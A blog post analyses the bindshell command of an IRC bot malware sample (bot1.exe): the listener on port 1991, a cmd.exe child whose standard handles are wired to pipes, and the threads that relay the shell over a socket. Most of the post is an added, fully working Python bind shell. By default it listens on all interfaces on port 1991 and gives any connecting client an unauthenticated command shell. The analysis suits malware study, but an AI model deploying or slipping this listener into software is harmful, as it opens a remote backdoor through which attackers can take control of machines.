Tuesday, 5 January 2010

bot1.exe part11 - bindshell command


When the bindshell command is issued, the usual notifications are first created and sent back to the channel:

15:41 <@unchk> .bd
17:10 < USA|28691> -bindshell- Server started on: 172.16.29.128:1991.

After this, a thread is created and its thread handle is stored; this handle is used when the 'bindshellstop' command is issued, which calls TerminateThread with it as argument. (Note that TerminateThread gives the target thread no chance to clean up, so the listening socket that thread created stays open unless it is closed elsewhere.)
The thread takes as argument the socket handle used for communication with the IRC server, creates a listener socket and binds it to local port 1991.
Once the socket is bound, the thread waits for connections. When a connection is accepted, a new process (cmd.exe) is created with its standard input/output/error overridden by the read and write ends of two anonymous pipes, as follows:

Standard Input - Read Handle of pipe 1
Standard Output - Write Handle of pipe 2
Standard Error - Dup'ed Write Handle of pipe 2

Afterwards two threads are created:
- The first one reads from the handle hReadPipe2 (the read handle of the second pipe) and sends that data down the connected_socket_handle. Since the write handle of pipe 2 is the standard output of the created cmd.exe process, this thread is in effect sending the output of cmd.exe back over the socket.
- The second one, in turn, receives data from the connected_socket_handle and writes it to the handle hWritePipe1. Since the standard input of the created cmd.exe is the read handle of pipe 1, writing to hWritePipe1 passes whatever was read from the socket to cmd.exe as input.

Once both threads are created, the original thread calls WaitForSingleObject on the child process with dwMilliseconds set to INFINITE. When the child process exits, the original thread terminates the two relay threads, terminates the created process, closes the four pipe handles, calls CloseHandle on the child's process handle and thread handle, and finally jumps back to accept to receive new connections.
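The whole sequence above (listener, accept, child shell with its three standard handles on two pipes, one relay thread per direction, wait for the child, clean up, back to accept), as an added example written for this page; it is not code from bot1.exe or from the original post. It is written in Python because its subprocess module performs exactly the CreatePipe/CreateProcess-with-STARTUPINFO-std-handles dance the post describes when run on Windows (on other platforms it falls back to pipe/fork/exec, and /bin/sh stands in for cmd.exe so the example runs anywhere). All names, the port default and the socketpair-based self-test are my own; the self-test drives the relay over a local socketpair so nothing is bound on the network.

```python
# Added example of the bindshell structure described in the post (not bot1.exe's code).
import socket
import subprocess
import sys
import threading

# cmd.exe on Windows as in the post; /bin/sh elsewhere so the example runs anywhere.
SHELL = ["cmd.exe"] if sys.platform == "win32" else ["/bin/sh"]
CHUNK = 4096


def pump_child_to_socket(child, conn):
    """Thread 1 of the post: read the child's stdout pipe (stderr is dup'ed onto it)
    and send everything down the connected socket until the pipe reaches EOF."""
    try:
        while True:
            data = child.stdout.read(CHUNK)  # bufsize=0, so this is a single read() call
            if not data:
                break                         # writer side closed: the shell has exited
            conn.sendall(data)
    except OSError:
        pass
    finally:
        try:
            conn.shutdown(socket.SHUT_WR)     # tell the peer there is no more output
        except OSError:
            pass


def pump_socket_to_child(child, conn):
    """Thread 2 of the post: receive from the socket and write to the child's stdin pipe."""
    try:
        while True:
            data = conn.recv(CHUNK)
            if not data:
                break                         # peer closed or listener shut the socket
            child.stdin.write(data)
            child.stdin.flush()
    except (OSError, ValueError):
        pass
    finally:
        try:
            child.stdin.close()               # EOF on stdin makes the shell exit
        except OSError:
            pass


def serve_connection(conn):
    """Spawn the shell with stdin/stdout/stderr on pipes, relay both ways, and return the
    shell's exit status once it terminates (the WaitForSingleObject(INFINITE) step)."""
    child = subprocess.Popen(SHELL, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT, bufsize=0)
    t_out = threading.Thread(target=pump_child_to_socket, args=(child, conn), daemon=True)
    t_in = threading.Thread(target=pump_socket_to_child, args=(child, conn), daemon=True)
    t_out.start()
    t_in.start()
    status = child.wait()                     # block until the shell process exits
    t_out.join(5)                             # stdout pipe hit EOF, so this thread is done
    try:
        conn.shutdown(socket.SHUT_RDWR)       # unblock recv() in the input thread
    except OSError:
        pass
    t_in.join(5)
    conn.close()
    child.stdout.close()
    return status


def bind_shell(host="0.0.0.0", port=1991, max_connections=None):
    """The listener loop of the post: bind, accept, serve, go back to accept.
    max_connections is my own addition so the loop can be bounded; None means forever."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    served = 0
    try:
        while max_connections is None or served < max_connections:
            conn, _peer = srv.accept()
            serve_connection(conn)            # one shell per connection, sequentially
            served += 1
    finally:
        srv.close()
    return served


def run_command_through_shell(command):
    """Self-test helper: drive serve_connection over a local socketpair (no network),
    send one command followed by 'exit', and return (output_bytes, exit_status)."""
    ours, theirs = socket.socketpair()
    result = []
    worker = threading.Thread(target=lambda: result.append(serve_connection(theirs)),
                              daemon=True)
    worker.start()
    ours.settimeout(15)
    ours.sendall(command + b"\nexit\n")
    out = b""
    try:
        while True:
            chunk = ours.recv(CHUNK)
            if not chunk:
                break                         # relay thread shut its write side
            out += chunk
    except OSError:
        pass
    ours.close()
    worker.join(10)
    return out, (result[0] if result else None)


if __name__ == "__main__":
    output, status = run_command_through_shell(b"echo relay-ok")
    print(output.decode(errors="replace"), "exit status:", status)
```

The two pump functions are the two relay threads of the post, and serve_connection is the accept-side thread: it waits on the child rather than on the relays, then shuts the socket down to unblock the input thread instead of calling TerminateThread, which is the cleanup the post notes the bot skips by terminating threads outright.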
